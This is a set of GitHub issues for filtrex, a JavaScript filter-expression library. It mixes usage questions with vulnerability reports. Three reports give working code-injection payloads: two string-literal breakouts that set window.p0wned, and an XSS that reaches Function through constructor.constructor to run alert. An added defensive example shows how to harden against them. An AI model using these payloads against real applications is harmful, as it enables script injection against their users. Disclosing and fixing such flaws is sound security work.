joewalnes / filtrex
A simple, safe, JavaScript Filter Expression compiler for end-users
License: MIT License
This will p0wn your browser.
compileExpression("'undefined:(window.p0wned=true)));((true?(x=>x)'()")()
Hi,
We are trying to consume filtrex.js in java using javax.script (nashorn).
And while it is loading the filtrex.js file, it is giving some syntax error as mentioned below.
javax.script.ScriptException: :115:17 Expected an operand but found error
yytext = JSON.stringify(yytext);
^ in at line number 115 at column number
Please let us know.
filtrex has a global name collision with requirejs's require. Can we please rename all references to require?
I'd like to use this to match text, like someone would with a search engine.
e.g. if I had the text
this is a test of the system
brad and his dog
this search would match
test or you and (brad and dog)
but this one wouldn't
test and rabbit
I could use a custom function, but for this use case, the variable names are actually the variable values.
Is there an easy way to do this? I'd prefer not to use a custom function, as I want it to be natural for my end users.
Filtrex seems to be vulnerable to cross site scripting. For example, in the highlighting example (http://rawgit.com/joewalnes/filtrex/master/example/highlight.html), if one enters the following string in the text input, an alert dialog appears:
constructor.constructor.name.replace("",constructor.constructor("alert('xss')"))
This is because Filtrex does not restrict the user-supplied functions only to own members of the functions object (abs, ceil, floor...), but allows accessing function members inherited from Object.prototype as well - for example, constructor, i.e. the Object() function. It's also possible to call functions in nested objects as well, such as constructor.constructor i.e. the Function() function.
The above was tested and worked on Firefox 29.0.1 (OS X 10.7) and Chrome 34.0 (OS X 10.7)
Strings (surrounding with double quotes) in filtrex expressions cannot contain any double quote characters themselves.
I'll open a PR to address this.
const expression = 'answer.index > 1 ? "Yes" : "No"';
const myfilter = filtrex(expression);
// Execute function
console.log(myfilter({ answer: { index: 2 } })); // returns "No"
Apparently, @joewalnes lost his interest in this package, and since I'm the only one reacting to issues here for some time now, I decided to continue the development on my fork of Filtrex. If you have any suggestions, ideas or questions, feel free to start an issue there.
I also started a dispute in order to acquire the NPM package filtrex, so that I'd be able to update it. Since then, you can use my package @m93a/filtrex which is up to date and includes several cool features and security fixes.
This will p0wn your browser.
compileExpression(`'"+(window.p0wned=true)+"'`)({});
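The two "p0wn" reports above and the earlier XSS report share a root cause: user text reaches generated JavaScript either as an unescaped string literal or as a property name that walks the prototype chain. The example below is added here and is not filtrex's own code; it shows the two hardening measures those reports call for, a function table with a null prototype looked up by own property only (so inherited names like constructor are rejected and dotted paths are refused), and string literals emitted with JSON.stringify so a quote in user text cannot close the literal. The names resolveFunction, isAllowedFunction and emitStringLiteral are this example's own.

```javascript
// Added example, not part of filtrex. A null-prototype table means there is
// no inherited "constructor", "__proto__" or "hasOwnProperty" to reach.
const SAFE_FUNCTIONS = Object.assign(Object.create(null), {
  abs: Math.abs,
  ceil: Math.ceil,
  floor: Math.floor,
});

// A bare identifier only: no dots, brackets or quotes, so "a.b" never parses.
const IDENT = /^[A-Za-z_][A-Za-z0-9_]*$/;

// Resolve a function name from a user expression; throws on anything that is
// not an own, callable entry of the table.
function resolveFunction(name, table = SAFE_FUNCTIONS) {
  if (typeof name !== "string" || !IDENT.test(name)) {
    throw new Error(`invalid function name: ${String(name)}`);
  }
  // Own-property check: "constructor" is inherited, so it is refused here.
  if (!Object.prototype.hasOwnProperty.call(table, name)) {
    throw new Error(`unknown function: ${name}`);
  }
  const fn = table[name];
  if (typeof fn !== "function") throw new Error(`not callable: ${name}`);
  return fn;
}

// Non-throwing variant for callers that only need a yes/no answer.
function isAllowedFunction(name, table = SAFE_FUNCTIONS) {
  try {
    resolveFunction(name, table);
    return true;
  } catch (e) {
    return false;
  }
}

// Emit a JavaScript string literal for user text. JSON.stringify escapes
// quotes, backslashes and line terminators, so the text cannot break out of
// the literal when the generated source is later compiled.
function emitStringLiteral(text) {
  return JSON.stringify(String(text));
}

// Compile an emitted literal back and confirm it round-trips unchanged.
function roundTripsLiteral(text) {
  return new Function("return " + emitStringLiteral(text) + ";")() === String(text);
}
```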
I need your library for parsing expressions but I saw that it only supports numbers and strings.
Is it possible to somehow allow date manipulation?
The expression I need to parse is:
'31.07.' + (myDate.getMonth() <= 7 ? myDate.getFullYear() + 3: myDate.getFullYear() + 4 )
I'm trying to get this to parse expressions with spaces e.g. Net Income > 10000. I have tried a few things like wrapping with quotes "Net Income" but that hasn't worked. Any ideas?
(Stolen from: https://github.com/mdo/wtf-forms/issues/5)
Joe I like this tool!
I ran this unit test, which is similar to your existing unit test. It always returns false/0
'filtrex: object string test': function(test) {
test.equal(1, compileExpression('obj.foo == "hello"')({obj:{foo:'hello'}}));
test.equal(0, compileExpression('obj.foo == "hello"')({obj:{foo:'bye'}}));
test.equal(0, compileExpression('obj.foo != "hello"')({obj:{foo:'hello'}}));
test.equal(1, compileExpression('obj.foo != "hello"')({obj:{foo:'bye'}}));
test.equal(true, compileExpression('obj.foo in ("aa", "bb")')({obj:{foo:'aa'}}));
test.equal(false, compileExpression('obj.foo in ("aa", "bb")')({obj:{foo:'c'}}));
test.equal(false, compileExpression('obj.foo not in ("aa", "bb")')({obj:{foo:'aa'}}));
test.equal(true, compileExpression('obj.foo not in ("aa", "bb")')({obj:{foo:'cc'}}));
}